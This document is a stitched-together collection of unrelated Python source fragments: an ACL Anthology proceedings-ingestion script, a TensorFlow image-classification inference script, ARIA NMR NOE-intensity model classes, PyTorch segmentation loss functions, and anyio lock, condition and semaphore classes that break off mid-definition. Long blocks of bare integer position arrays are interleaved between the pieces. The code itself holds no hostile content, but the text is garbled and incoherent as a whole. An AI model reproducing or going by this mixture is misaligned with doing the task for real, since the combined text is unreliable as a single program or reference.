rf"{year}\.{venue_name}-\w+\.(\d+)_?(\w+)\.(\w+)$", attachment_file
)
if match is None:
print(
f"* Warning: no attachment match for {attachment_file}",
file=sys.stderr,
)
sys.exit(2)
paper_num, type_, ext = match.groups()
paper_num = int(paper_num)
file_name = f"{collection_id}-{volume_name}.{paper_num}.{type_}.{ext}"
dest_path = os.path.join(attachments_dest_dir, file_name)
if not args.dry_run and not os.path.exists(dest_path):
log(f"Copying {attachment_file} -> {dest_path}", args.dry_run)
shutil.copyfile(attachment_file_path, dest_path)
collections[collection_id][volume_name][paper_num]["attachments"].append(
(dest_path, type_)
)
people = AnthologyIndex(None, srcdir=anthology_datadir)
def correct_caps(person, name_node, anth_id):
"""
Many people submit their names in "ALL CAPS" or "all lowercase".
Correct this with heuristics.
"""
name = name_node.text
if name.islower() or name.isupper():
# capitalize all parts
corrected = " ".join(list(map(lambda x: x.capitalize(), name.split())))
print(
f"-> Correcting capitalization of '{name}' to '{corrected}'",
file=sys.stderr,
)
name_node.text = corrected
def disambiguate_name(node, anth_id):
name = PersonName.from_element(node)
ids = people.get_ids(name)
if len(ids) > 1:
choice = -1
while choice < 0 or choice >= len(ids):
print(
f"({anth_id}): ambiguous author {name}; Please choose from the following:"
)
for i, id_ in enumerate(ids):
print(f"[{i}] {id_} ({people.get_comment(id_)})")
choice = int(input("--> "))
node.attrib["id"] = ids[choice]
for collection_id, collection in collections.items():
# Newly added volumes, so we can normalize and name-disambig later
newly_added_volumes = []
collection_file = os.path.join(
args.anthology_dir, "data", "xml", f"{collection_id}.xml"
)
if os.path.exists(collection_file):
root_node = etree.parse(collection_file).getroot()
else:
root_node = make_simple_element("collection", attrib={"id": collection_id})
for volume_id, volume in collection.items():
volume_node = make_simple_element(
"volume",
attrib={"id": volume_id, "ingest-date": args.ingest_date},
)
# Replace the existing one if present
existing_volume_node = root_node.find(f"./volume[@id='{volume_id}']")
for i, child in enumerate(root_node):
if child.attrib["id"] == volume_id:
root_node[i] = volume_node
break
else:
root_node.append(volume_node)
meta_node = None
for paper_num, paper in sorted(volume.items()):
paper_id_full = paper["anthology_id"]
bibfile = paper["bib"]
paper_node = bib2xml(bibfile, paper_id_full)
if paper_node.attrib["id"] == "0":
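                # Paper 0 is the volume's front matter; its fields (booktitle,
                # editors, publisher, etc.) seed the volume-level <meta> block.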
# create metadata subtree
meta_node = make_simple_element("meta", parent=volume_node)
title_node = paper_node.find("title")
title_node.tag = "booktitle"
meta_node.append(title_node)
for author_or_editor in chain(
paper_node.findall("./author"), paper_node.findall("./editor")
):
meta_node.append(author_or_editor)
author_or_editor.tag = "editor"
meta_node.append(paper_node.find("publisher"))
meta_node.append(paper_node.find("address"))
meta_node.append(paper_node.find("month"))
meta_node.append(paper_node.find("year"))
if book_dest_path is not None:
make_simple_element(
"url",
text=f"{collection_id}-{volume_name}",
attrib={"hash": compute_hash_from_file(book_dest_path)},
parent=meta_node,
)
# modify frontmatter tag
paper_node.tag = "frontmatter"
del paper_node.attrib["id"]
else:
# remove unneeded fields
for child in paper_node:
if child.tag in [
"editor",
"address",
"booktitle",
"publisher",
"year",
"month",
]:
paper_node.remove(child)
url = paper_node.find("./url")
if url is not None:
url.attrib["hash"] = compute_hash_from_file(paper["pdf"])
for path, type_ in paper["attachments"]:
make_simple_element(
"attachment",
text=os.path.basename(path),
attrib={
"type": type_,
"hash": compute_hash_from_file(path),
},
parent=paper_node,
)
if len(paper_node) > 0:
volume_node.append(paper_node)
# Normalize
for oldnode in paper_node:
normalize(oldnode, informat="latex")
# Adjust the language tag
language_node = paper_node.find("./language")
if language_node is not None:
try:
lang = iso639.languages.get(name=language_node.text)
except KeyError:
raise Exception(f"Can't find language '{language_node.text}'")
language_node.text = lang.part3
print(language_node.text)
# Fix author names
for name_node in chain(
paper_node.findall("./author"), paper_node.findall("./editor")
):
disambiguate_name(name_node, paper_id_full)
person = PersonName.from_element(name_node)
for name_part in name_node:
correct_caps(person, name_part, paper_id_full)
# Other data from the meta file
if "isbn" in meta:
make_simple_element("isbn", meta["isbn"], parent=meta_node)
indent(root_node)
tree = etree.ElementTree(root_node)
tree.write(
collection_file, encoding="UTF-8", xml_declaration=True, with_tail=True
)
if __name__ == "__main__":
now = datetime.now()
today = f"{now.year}-{now.month:02d}-{now.day:02d}"
parser = argparse.ArgumentParser()
parser.add_argument(
"proceedings", nargs="+", help="List of paths to ACLPUB proceedings/ directories."
)
parser.add_argument(
"--ingest-date",
"-d",
type=str,
default=today,
help="Ingestion date as YYYY-MM-DD. Default: %(default)s.",
)
anthology_path = os.path.join(os.path.dirname(sys.argv[0]), "..")
parser.add_argument(
"--anthology-dir",
"-r",
default=anthology_path,
help="Root path of ACL Anthology Github repo. Default: %(default)s.",
)
pdfs_path = os.path.join(os.environ["HOME"], "anthology-files", "pdf")
parser.add_argument(
"--pdfs-dir", "-p", default=pdfs_path, help="Root path for placement of PDF files"
)
attachments_path = os.path.join(os.environ["HOME"], "anthology-files", "attachments")
parser.add_argument(
"--attachments-dir",
"-a",
default=attachments_path,
help="Root path for placement of PDF files",
)
parser.add_argument(
"--dry-run", "-n", action="store_true", help="Don't actually copy anything."
)
args = parser.parse_args()
main(args)
| [
[
[
1191,
1199
],
[
18392,
18400
]
],
[
[
1207,
1213
],
[
17250,
17256
]
],
[
[
1221,
1223
],
[
18740,
18742
],
[
18753,
18755
],
[
18987,
18989
],
[
19000,
19002
],
[
19191,
19193
],
[
19204,
19206
],
[
2677,
2679
],
[
5919,
5921
],
[
5932,
5934
],
[
6298,
6300
],
[
7936,
7938
],
[
8160,
8162
],
[
8215,
8217
],
[
8258,
8260
],
[
8349,
8351
],
[
8591,
8593
],
[
8649,
8651
],
[
8837,
8839
],
[
8892,
8894
],
[
9051,
9053
],
[
9106,
9108
],
[
9173,
9175
],
[
9529,
9531
],
[
9730,
9732
],
[
9798,
9800
],
[
10313,
10315
],
[
10328,
10330
],
[
10403,
10405
],
[
10469,
10471
],
[
10523,
10525
],
[
10592,
10594
],
[
10603,
10605
],
[
10662,
10664
],
[
10781,
10783
],
[
11466,
11468
],
[
11556,
11558
],
[
13267,
13269
],
[
13372,
13374
],
[
16564,
16566
]
],
[
[
1231,
1233
],
[
2141,
2143
],
[
2419,
2421
],
[
6601,
6603
],
[
9308,
9310
],
[
10898,
10900
]
],
[
[
1241,
1249
]
],
[
[
1257,
1263
],
[
2869,
2875
],
[
11686,
11692
]
],
[
[
1271,
1274
],
[
18769,
18772
],
[
1979,
1982
],
[
3449,
3452
],
[
3469,
3472
],
[
3859,
3862
],
[
5741,
5744
],
[
5786,
5789
],
[
5948,
5951
],
[
6577,
6580
],
[
11185,
11188
],
[
11239,
11242
],
[
12442,
12445
]
],
[
[
1283,
1302
],
[
13429,
13434
],
[
18125,
18130
]
],
[
[
1328,
1339
],
[
5852,
5863
]
],
[
[
1341,
1352
],
[
5864,
5875
]
],
[
[
1374,
1382
],
[
18307,
18315
],
[
6444,
6452
]
],
[
[
1411,
1420
],
[
17006,
17015
]
],
[
[
1450,
1461
],
[
3600,
3611
]
],
[
[
1490,
1504
],
[
11897,
11911
]
],
[
[
1534,
1544
],
[
17789,
17799
],
[
12565,
12575
]
],
[
[
1572,
1580
],
[
6125,
6133
]
],
[
[
1615,
1634
],
[
3884,
3903
],
[
4973,
4992
],
[
5034,
5053
],
[
5113,
5132
],
[
5566,
5585
],
[
13506,
13525
],
[
13650,
13669
],
[
14533,
14552
],
[
15345,
15364
],
[
16476,
16495
],
[
18023,
18042
]
],
[
[
1640,
1658
]
],
[
[
1664,
1688
],
[
3334,
3358
]
],
[
[
1694,
1700
],
[
18092,
18098
]
],
[
[
1706,
1728
],
[
2706,
2728
],
[
2759,
2781
],
[
15512,
15534
],
[
16361,
16383
],
[
16700,
16722
]
],
[
[
1761,
1771
],
[
5994,
6004
]
],
[
[
1795,
1800
],
[
14781,
14786
],
[
17587,
17592
]
],
[
[
1820,
1824
],
[
2021,
2025
]
],
[
[
1826,
1829
],
[
2031,
2034
]
],
[
[
1851,
1858
]
],
[
[
1865,
1868
],
[
2802,
2805
],
[
3667,
3670
],
[
3804,
3807
],
[
4047,
4050
],
[
11603,
11606
]
],
[
[
1997,
2006
],
[
6288,
6297
]
],
[
[
2569,
2579
],
[
8956,
8966
],
[
9971,
9981
]
],
[
[
2915,
2922
],
[
14371,
14378
]
],
[
[
5822,
5826
],
[
19571,
19575
]
],
[
[
18301,
18304
],
[
18337,
18340
],
[
18348,
18351
],
[
18364,
18367
]
],
[
[
18326,
18331
],
[
18638,
18643
]
],
[
[
18383,
18389
],
[
18422,
18428
],
[
18544,
18550
],
[
18793,
18799
],
[
19050,
19056
],
[
19262,
19268
],
[
19423,
19429
],
[
19546,
19552
]
],
[
[
18723,
18737
],
[
18871,
18885
]
],
[
[
18975,
18984
],
[
19107,
19116
]
],
[
[
19172,
19188
],
[
19342,
19358
]
],
[
[
19539,
19543
],
[
19576,
19580
],
[
2847,
2851
]
]
] |
import tensorflow as tf
import numpy as np
import os,glob,cv2
import sys,argparse
# First, pass the path of the image
dir_path = os.path.dirname(os.path.realpath(__file__))
image_path=sys.argv[1]
filename = dir_path +'/' +image_path
image_size=128
num_channels=3
images = []
# Reading the image using OpenCV
image = cv2.imread(filename)
# Resize the image to the desired size; preprocessing must match exactly what was done during training
image = cv2.resize(image, (image_size, image_size),0,0, cv2.INTER_LINEAR)
images.append(image)
images = np.array(images, dtype=np.uint8)
images = images.astype('float32')
images = np.multiply(images, 1.0/255.0)
#The input to the network is of shape [None image_size image_size num_channels]. Hence we reshape.
x_batch = images.reshape(1, image_size,image_size,num_channels)
## Let us restore the saved model
sess = tf.Session()
# Step-1: Recreate the network graph. At this step only the graph is created.
saver = tf.train.import_meta_graph('ore-mine-model.meta')
# Step-2: Now let's load the weights saved using the restore method.
saver.restore(sess, tf.train.latest_checkpoint('./'))
# Accessing the default graph which we have restored
graph = tf.get_default_graph()
# Now, let's get hold of the op that needs to be processed to get the output.
# In the original network, y_pred is the tensor that holds the network's prediction
y_pred = graph.get_tensor_by_name("y_pred:0")
## Let's feed the images to the input placeholders
x= graph.get_tensor_by_name("x:0")
y_true = graph.get_tensor_by_name("y_true:0")
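# The restored graph still expects a value for y_true, so feed dummy zeros with one
# column per class (the class count is presumably the number of entries in 'training_data').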
y_test_images = np.zeros((1, len(os.listdir('training_data'))))
### Create the feed_dict required to compute y_pred
feed_dict_testing = {x: x_batch, y_true: y_test_images}
result=sess.run(y_pred, feed_dict=feed_dict_testing)
# result is of this format: [probability_of_class_0, probability_of_class_1, ...]
print(result)
| [
[
[
7,
23
],
[
862,
864
],
[
957,
959
],
[
1096,
1098
],
[
1192,
1194
]
],
[
[
31,
42
],
[
548,
550
],
[
571,
573
],
[
624,
626
],
[
1574,
1576
]
],
[
[
50,
52
],
[
131,
133
],
[
147,
149
],
[
1591,
1593
]
],
[
[
53,
57
]
],
[
[
58,
61
],
[
319,
322
],
[
452,
455
],
[
500,
503
]
],
[
[
69,
72
],
[
186,
189
]
],
[
[
73,
81
]
],
[
[
120,
128
],
[
210,
218
]
],
[
[
175,
185
],
[
225,
235
]
],
[
[
199,
207
],
[
330,
338
]
],
[
[
236,
246
],
[
471,
481
],
[
483,
493
],
[
783,
793
],
[
794,
804
]
],
[
[
251,
263
],
[
805,
817
]
],
[
[
266,
272
],
[
518,
524
],
[
557,
563
]
],
[
[
311,
316
],
[
463,
468
]
],
[
[
444,
449
],
[
532,
537
]
],
[
[
539,
545
],
[
590,
596
]
],
[
[
581,
587
],
[
636,
642
]
],
[
[
615,
621
],
[
765,
771
]
],
[
[
755,
762
],
[
1724,
1731
]
],
[
[
855,
859
],
[
1090,
1094
],
[
1763,
1767
]
],
[
[
949,
954
],
[
1076,
1081
]
],
[
[
1184,
1189
],
[
1386,
1391
],
[
1478,
1483
],
[
1520,
1525
]
],
[
[
1377,
1383
],
[
1772,
1778
]
],
[
[
1475,
1476
],
[
1721,
1722
]
],
[
[
1511,
1517
],
[
1733,
1739
]
],
[
[
1558,
1571
],
[
1741,
1754
]
],
[
[
1700,
1717
],
[
1790,
1807
]
],
[
[
1756,
1762
],
[
1888,
1894
]
]
] |
"""
ARIA -- Ambiguous Restraints for Iterative Assignment
A software for automated NOE assignment
Version 2.3
Copyright (C) Benjamin Bardiaux, Michael Habeck, Therese Malliavin,
Wolfgang Rieping, and Michael Nilges
All rights reserved.
NO WARRANTY. This software package is provided 'as is' without warranty of
any kind, expressed or implied, including, but not limited to the implied
warranties of merchantability and fitness for a particular purpose or
a warranty of non-infringement.
Distribution of substantively modified versions of this module is
prohibited without the explicit permission of the copyright holders.
$Author: bardiaux $
$Revision: 1.1.1.1 $
$Date: 2010/03/23 15:27:24 $
"""
from aria.ariabase import *
#import numpy as N
from numpy import *
from aria.Settings import Settings
class NOEModel(AriaBaseClass):
"""
The main class for calculating NOE spectra from structures.
Update: Malliavin/Bardiaux
    Becomes an abstract class to distinguish ISPA from RelaxationMatrix
    and to include the spin-diffusion correction of distances
"""
def __init__(self):
AriaBaseClass.__init__(self)
from aria.Contribution import ContributionEvaluator
self.__evaluator = ContributionEvaluator()
self.is_spin_diff = None
class ISPA(NOEModel):
def __init__(self):
NOEModel.__init__(self)
from aria.Contribution import ContributionEvaluator
self.__evaluator = ContributionEvaluator()
def calculatePeaksize(self, peak, ensemble):
"""
        For the given peak (AriaPeak), this method computes
        the intensity of a simulated NOE w.r.t. the instance's ensemble
        of structures.
        n_c: number of contributions
        c_i: i-th contribution (i = 1, ..., n_c)
        <c_i>: ensemble average of the i-th contribution.
        NOE = \sum_{i=1}^{n_c} <c_i>^{-6}
        i.e. the NOE is a sum over ensemble-averaged contributions.
"""
check_type(peak, 'AriaPeak')
check_type(ensemble, 'StructureEnsemble')
if not peak:
self.error(ValueError, 'No contributions in xpk: %d' %
peak.getId())
from aria.mathutils import average
self.__evaluator.setStructureEnsemble(ensemble)
## for each structure: calculate effective distance
## for contribution, i.e. distances between atoms
## of every spinpair are averaged according to the
## type of the given contribution.
f = self.__evaluator.effective_distances
avg_distances = [f(c) for c in peak.getContributions()]
## for each contribution: calculate ensemble-average
## TODO: average -> _average, probably faster
avg_distances = average(avg_distances, axis = 1)
## calculate NOEs
d = power(avg_distances, -6.)
## NOE is sum over partial NOEs
return sum(d)
class SpinDiffusionCorrection(NOEModel):
def __init__(self):
NOEModel.__init__(self)
from aria.Contribution import ContributionEvaluator
self.__evaluator = ContributionEvaluator()
self.__intensity_matrix = {}
def prepare(self, molecule, ensemble):
from aria.Relaxation import Relaxation
self.relaxation = Relaxation()
self.relaxation.initialize(molecule, ensemble)
self._spin_first_atom = self.relaxation.getNonEquivalentSpinList()
self.spin_ids = self.relaxation.spin_list_id
self._spin_multiplicity = self.relaxation.getSpinMultiplicity()
def setIntensityMatrix(self, spectrum):
m = self.relaxation.calculateIntensityMatrix(spectrum)
spectrum_name = spectrum.getName()
self.__intensity_matrix[spectrum_name] = m
def getIntensityMatrix(self, name):
return self.__intensity_matrix[name]
def calculatePeaksize(self, peak, ensemble):
## Malliavin 2005/2006
"""
        For the given peak (AriaPeak), this method computes
        the intensity of a simulated NOE w.r.t. the instance's ensemble
        of structures.
        n_c: number of contributions
        c_i: i-th contribution (i = 1, ..., n_c)
        <c_i>: ensemble average of the i-th contribution.
        NOE = \sum_{i=1}^{n_c} <c_i>^{-6}
        i.e. the NOE is a sum over ensemble-averaged contributions.
"""
check_type(peak, 'AriaPeak')
check_type(ensemble, 'StructureEnsemble')
if not peak:
self.error(ValueError, 'No contributions in xpk: %d' %
peak.getId())
from aria.mathutils import average
from time import clock
self.__evaluator.setStructureEnsemble(ensemble)
# Modification Therese Malliavin, December 16, 2005
spectrum = peak.getReferencePeak().getSpectrum()
spectrum_name = spectrum.getName()
intensities = self.getIntensityMatrix(spectrum_name)
atoms = [tuple(sp.getAtoms()) for c in peak.getContributions() for sp in c.getSpinPairs()]
lstintens = []
spsys = [c.getSpinSystems() for c in peak.getContributions()]
atoms = [(s[0].getAtoms()[0], s[1].getAtoms()[0]) for s in spsys]
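        # Look up the spin index of each atom in the pair and read the simulated
        # peak intensity from the precomputed intensity matrix.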
for a1, a2 in atoms:
sp1 = self.spin_ids[a1.getId()]
sp2 = self.spin_ids[a2.getId()]
lstintens.append(intensities[sp1,sp2])
## for a1, a2 in atoms:
## #uu = [sp.count(a1) for sp in SpinFirstAtom]
## #sp1 = uu.index(1)
## #sp1 = self._get_spin_first_atom_id(a1)
## sp1 = self.spin_ids[a1.getId()]
## if self._spin_multiplicity[sp1] > 1 and a1 != self._spin_first_atom[sp1][0]:
## sp1 = 0
## #sp2 = self._get_spin_first_atom_id(a2)
## sp2 = self.spin_ids[a2.getId()]
## #uu = [sp.count(a2) for sp in SpinFirstAtom]
## #sp2 = uu.index(1)
## if self._spin_multiplicity[sp2] > 1 and a2 != self._spin_first_atom[sp2][0]:
## sp2 = 0
## if sp1 != 0 and sp2 != 0:
## lstintens.append(intensities[sp1,sp2])
## for a1, a2 in atoms:
## sp1 = self.spin_ids[a1.getId()]
## sp2 = self.spin_ids[a2.getId()]
## lstintens.append(intensities[sp1,sp2])
int_aria_pk = sum(lstintens)
peak.setTheoricVolume(int_aria_pk)
## TEST ISPA
ispa = []
for a1, a2 in atoms:
sp1 = self.spin_ids[a1.getId()]
sp2 = self.spin_ids[a2.getId()]
ispa.append(self.relaxation.distance_matrix[sp1,sp2])
peak.setIspa(sum(ispa))
return int_aria_pk
def _get_spin_first_atom_id(self, a):
for i in range(len(self._spin_first_atom)):
if a in self._spin_first_atom[i]: return i
| [
[
[
807,
808
]
],
[
[
846,
847
],
[
899,
912
],
[
1192,
1205
],
[
2057,
2067
],
[
2094,
2104
],
[
2918,
2923
],
[
4494,
4504
],
[
4531,
4541
]
],
[
[
874,
882
]
],
[
[
890,
898
],
[
1387,
1395
],
[
3040,
3048
],
[
1431,
1439
],
[
3093,
3101
]
],
[
[
1382,
1386
]
],
[
[
3016,
3039
]
]
] |
import numpy as np
import torch
import torch.nn.functional as F
import torch.nn as nn
from sklearn.utils import class_weight
from utils.lovasz_losses import lovasz_softmax
import pdb
def make_one_hot(labels, classes):
one_hot = torch.FloatTensor(labels.size()[0], classes, labels.size()[2], labels.size()[3]).zero_().to(labels.device)
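    # Scatter 1s along the class dimension at the positions given by the labels.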
target = one_hot.scatter_(1, labels.data, 1)
return target
def get_weights(target):
t_np = target.view(-1).data.cpu().numpy()
classes, counts = np.unique(t_np, return_counts=True)
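    # Median-frequency balancing: classes with fewer pixels get weights > 1.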
cls_w = np.median(counts) / counts
#cls_w = class_weight.compute_class_weight('balanced', classes, t_np)
weights = np.ones(7)
weights[classes] = cls_w
return torch.from_numpy(weights).float().cuda()
class CrossEntropyLoss2d(nn.Module):
def __init__(self, weight=None, ignore_index=255, reduction='mean'):
super(CrossEntropyLoss2d, self).__init__()
self.CE = nn.CrossEntropyLoss(weight=weight, ignore_index=ignore_index, reduction=reduction)
def forward(self, output, target):
loss = self.CE(output, target)
return loss
class DiceLoss(nn.Module):
def __init__(self, smooth=1., ignore_index=255):
super(DiceLoss, self).__init__()
self.ignore_index = ignore_index
self.smooth = smooth
def forward(self, output, target):
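        # Remap ignore_index pixels onto an existing class, presumably so the
        # one-hot scatter below does not index out of range.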
if self.ignore_index not in range(target.min(), target.max()):
if (target == self.ignore_index).sum() > 0:
target[target == self.ignore_index] = target.min()
target = make_one_hot(target.unsqueeze(dim=1), classes=output.size()[1])
output = F.softmax(output, dim=1)
output_flat = output.contiguous().view(-1)
target_flat = target.contiguous().view(-1)
intersection = (output_flat * target_flat).sum()
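        # Soft Dice: 1 - 2*intersection / (|output| + |target|), smoothed to avoid division by zero.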
loss = 1 - ((2. * intersection + self.smooth) /
(output_flat.sum() + target_flat.sum() + self.smooth))
return loss
class FocalLoss(nn.Module):
def __init__(self, gamma=2, alpha=None, ignore_index=255, size_average=True):
super(FocalLoss, self).__init__()
self.gamma = gamma
self.size_average = size_average
self.CE_loss = nn.CrossEntropyLoss(reduce=False, ignore_index=ignore_index, weight=alpha)
def forward(self, output, target):
logpt = self.CE_loss(output, target)
pt = torch.exp(-logpt)
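        # The focal term (1 - pt)**gamma down-weights well-classified examples.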
loss = ((1-pt)**self.gamma) * logpt
if self.size_average:
return loss.mean()
return loss.sum()
class CE_DiceLoss(nn.Module):
def __init__(self, smooth=1, reduction='mean', ignore_index=255, weight=None):
super(CE_DiceLoss, self).__init__()
self.smooth = smooth
self.dice = DiceLoss()
self.cross_entropy = nn.CrossEntropyLoss(weight=weight, reduction=reduction, ignore_index=ignore_index)
def forward(self, output, target):
CE_loss = self.cross_entropy(output, target)
dice_loss = self.dice(output, target)
return CE_loss + dice_loss
class LovaszSoftmax(nn.Module):
def __init__(self, classes='present', per_image=False, ignore_index=255):
super(LovaszSoftmax, self).__init__()
self.smooth = classes
self.per_image = per_image
self.ignore_index = ignore_index
def forward(self, output, target):
logits = F.softmax(output, dim=1)
loss = lovasz_softmax(logits, target, ignore=self.ignore_index)
return loss
| [
[
[
7,
18
],
[
503,
505
],
[
551,
553
],
[
667,
669
]
],
[
[
26,
31
],
[
234,
239
],
[
718,
723
],
[
2398,
2403
]
],
[
[
39,
63
],
[
1646,
1647
],
[
3379,
3380
]
],
[
[
71,
85
],
[
785,
787
],
[
1138,
1140
],
[
1998,
2000
],
[
2566,
2568
],
[
3076,
3078
],
[
940,
942
],
[
2225,
2227
],
[
2794,
2796
]
],
[
[
112,
124
]
],
[
[
158,
172
],
[
3419,
3433
]
],
[
[
180,
183
]
],
[
[
189,
201
],
[
1565,
1577
]
],
[
[
413,
424
]
],
[
[
766,
784
],
[
884,
902
]
],
[
[
1129,
1137
],
[
1217,
1225
],
[
2754,
2762
]
],
[
[
1988,
1997
],
[
2106,
2115
]
],
[
[
2554,
2565
],
[
2675,
2686
]
],
[
[
3062,
3075
],
[
3180,
3193
]
]
] |
from collections import deque
from dataclasses import dataclass
from types import TracebackType
from typing import Deque, Optional, Tuple, Type
from warnings import warn
from ..lowlevel import cancel_shielded_checkpoint, checkpoint, checkpoint_if_cancelled
from ._compat import DeprecatedAwaitable
from ._eventloop import get_asynclib
from ._exceptions import BusyResourceError, WouldBlock
from ._tasks import CancelScope
from ._testing import TaskInfo, get_current_task
@dataclass(frozen=True)
class EventStatistics:
"""
:ivar int tasks_waiting: number of tasks waiting on :meth:`~.Event.wait`
"""
tasks_waiting: int
@dataclass(frozen=True)
class CapacityLimiterStatistics:
"""
:ivar int borrowed_tokens: number of tokens currently borrowed by tasks
:ivar float total_tokens: total number of available tokens
:ivar tuple borrowers: tasks or other objects currently holding tokens borrowed from this
limiter
:ivar int tasks_waiting: number of tasks waiting on :meth:`~.CapacityLimiter.acquire` or
:meth:`~.CapacityLimiter.acquire_on_behalf_of`
"""
borrowed_tokens: int
total_tokens: float
borrowers: Tuple[object, ...]
tasks_waiting: int
@dataclass(frozen=True)
class LockStatistics:
"""
:ivar bool locked: flag indicating if this lock is locked or not
:ivar ~anyio.TaskInfo owner: task currently holding the lock (or ``None`` if the lock is not
held by any task)
:ivar int tasks_waiting: number of tasks waiting on :meth:`~.Lock.acquire`
"""
locked: bool
owner: Optional[TaskInfo]
tasks_waiting: int
@dataclass(frozen=True)
class ConditionStatistics:
"""
:ivar int tasks_waiting: number of tasks blocked on :meth:`~.Condition.wait`
:ivar ~anyio.LockStatistics lock_statistics: statistics of the underlying :class:`~.Lock`
"""
tasks_waiting: int
lock_statistics: LockStatistics
@dataclass(frozen=True)
class SemaphoreStatistics:
"""
:ivar int tasks_waiting: number of tasks waiting on :meth:`~.Semaphore.acquire`
"""
tasks_waiting: int
class Event:
def __new__(cls):
return get_asynclib().Event()
def set(self) -> DeprecatedAwaitable:
"""Set the flag, notifying all listeners."""
raise NotImplementedError
def is_set(self) -> bool:
"""Return ``True`` if the flag is set, ``False`` if not."""
raise NotImplementedError
async def wait(self) -> bool:
"""
Wait until the flag has been set.
If the flag has already been set when this method is called, it returns immediately.
"""
raise NotImplementedError
def statistics(self) -> EventStatistics:
"""Return statistics about the current state of this event."""
raise NotImplementedError
class Lock:
_owner_task: Optional[TaskInfo] = None
def __init__(self):
self._waiters: Deque[Tuple[TaskInfo, Event]] = deque()
async def __aenter__(self):
await self.acquire()
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
self.release()
async def acquire(self) -> None:
"""Acquire the lock."""
await checkpoint_if_cancelled()
try:
self.acquire_nowait()
except WouldBlock:
task = get_current_task()
event = Event()
token = task, event
self._waiters.append(token)
try:
await event.wait()
except BaseException:
if not event.is_set():
self._waiters.remove(token)
raise
assert self._owner_task == task
else:
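            # Acquired without waiting: still execute a checkpoint, shielded so a
            # cancellation cannot strike after the lock has already been taken.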
await cancel_shielded_checkpoint()
def acquire_nowait(self) -> None:
"""
Acquire the lock, without blocking.
:raises ~WouldBlock: if the operation would block
"""
task = get_current_task()
if self._owner_task == task:
raise RuntimeError('Attempted to acquire an already held Lock')
if self._owner_task is not None:
raise WouldBlock
self._owner_task = task
def release(self) -> DeprecatedAwaitable:
"""Release the lock."""
if self._owner_task != get_current_task():
raise RuntimeError('The current task is not holding this lock')
if self._waiters:
self._owner_task, event = self._waiters.popleft()
event.set()
else:
del self._owner_task
return DeprecatedAwaitable(self.release)
def locked(self) -> bool:
"""Return True if the lock is currently held."""
return self._owner_task is not None
def statistics(self) -> LockStatistics:
"""
Return statistics about the current state of this lock.
.. versionadded:: 3.0
"""
return LockStatistics(self.locked(), self._owner_task, len(self._waiters))
class Condition:
_owner_task: Optional[TaskInfo] = None
def __init__(self, lock: Optional[Lock] = None):
self._lock = lock or Lock()
self._waiters: Deque[Event] = deque()
async def __aenter__(self):
await self.acquire()
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
self.release()
def _check_acquired(self) -> None:
if self._owner_task != get_current_task():
raise RuntimeError('The current task is not holding the underlying lock')
async def acquire(self) -> None:
"""Acquire the underlying lock."""
await self._lock.acquire()
self._owner_task = get_current_task()
def acquire_nowait(self) -> None:
"""
Acquire the underlying lock, without blocking.
:raises ~WouldBlock: if the operation would block
"""
self._lock.acquire_nowait()
self._owner_task = get_current_task()
def release(self) -> DeprecatedAwaitable:
"""Release the underlying lock."""
self._lock.release()
return DeprecatedAwaitable(self.release)
def locked(self) -> bool:
"""Return True if the lock is set."""
return self._lock.locked()
def notify(self, n: int = 1) -> None:
"""Notify exactly n listeners."""
self._check_acquired()
for _ in range(n):
try:
event = self._waiters.popleft()
except IndexError:
break
event.set()
def notify_all(self) -> None:
"""Notify all the listeners."""
self._check_acquired()
for event in self._waiters:
event.set()
self._waiters.clear()
async def wait(self) -> None:
"""Wait for a notification."""
await checkpoint()
event = Event()
self._waiters.append(event)
self.release()
try:
await event.wait()
except BaseException:
if not event.is_set():
self._waiters.remove(event)
raise
finally:
with CancelScope(shield=True):
await self.acquire()
def statistics(self) -> ConditionStatistics:
"""
Return statistics about the current state of this condition.
.. versionadded:: 3.0
"""
return ConditionStatistics(len(self._waiters), self._lock.statistics())
class Semaphore:
def __init__(self, initial_value: int, *, max_value: Optional[int] = None):
if not isinstance(initial_value, int):
raise TypeError('initial_value must be an integer')
if initial_value < 0:
raise ValueError('initial_value must be >= 0')
if max_value is not None:
if not isinstance(max_value, int):
raise TypeError('max_value must be an integer or None')
if max_value < initial_value:
raise ValueError('max_value must be equal to or higher than initial_value')
self._value = initial_value
self._max_value = max_value
self._waiters: Deque[Event] = deque()
async def __aenter__(self) -> 'Semaphore':
await self.acquire()
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
self.release()
async def acquire(self) -> None:
"""Decrement the semaphore value, blocking if necessary."""
await checkpoint_if_cancelled()
try:
self.acquire_nowait()
except WouldBlock:
event = Event()
self._waiters.append(event)
try:
await event.wait()
except BaseException:
if not event.is_set():
self._waiters.remove(event)
raise
else:
await cancel_shielded_checkpoint()
def acquire_nowait(self) -> None:
"""
        Acquire the semaphore, without blocking.
:raises ~WouldBlock: if the operation would block
"""
if self._value == 0:
raise WouldBlock
self._value -= 1
def release(self) -> DeprecatedAwaitable:
"""Increment the semaphore value."""
if self._max_value is not None and self._value == self._max_value:
raise ValueError('semaphore released too many times')
if self._waiters:
self._waiters.popleft().set()
else:
self._value += 1
return DeprecatedAwaitable(self.release)
@property
def value(self) -> int:
"""The current value of the semaphore."""
return self._value
@property
def max_value(self) -> Optional[int]:
"""The maximum value of the semaphore."""
return self._max_value
def statistics(self) -> SemaphoreStatistics:
"""
Return statistics about the current state of this semaphore.
.. versionadded:: 3.0
"""
return SemaphoreStatistics(len(self._waiters))
class CapacityLimiter:
def __new__(cls, total_tokens: float):
return get_asynclib().CapacityLimiter(total_tokens)
async def __aenter__(self):
raise NotImplementedError
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
raise NotImplementedError
@property
def total_tokens(self) -> float:
"""
The total number of tokens available for borrowing.
This is a read-write property. If the total number of tokens is increased, the
proportionate number of tasks waiting on this limiter will be granted their tokens.
.. versionchanged:: 3.0
The property is now writable.
"""
raise NotImplementedError
@total_tokens.setter
def total_tokens(self, value: float) -> None:
raise NotImplementedError
async def set_total_tokens(self, value) -> None:
warn('CapacityLimiter.set_total_tokens has been deprecated. Set the value of the'
'"total_tokens" attribute directly.', DeprecationWarning)
self.total_tokens = value
@property
def borrowed_tokens(self) -> int:
"""The number of tokens that have currently been borrowed."""
raise NotImplementedError
@property
def available_tokens(self) -> float:
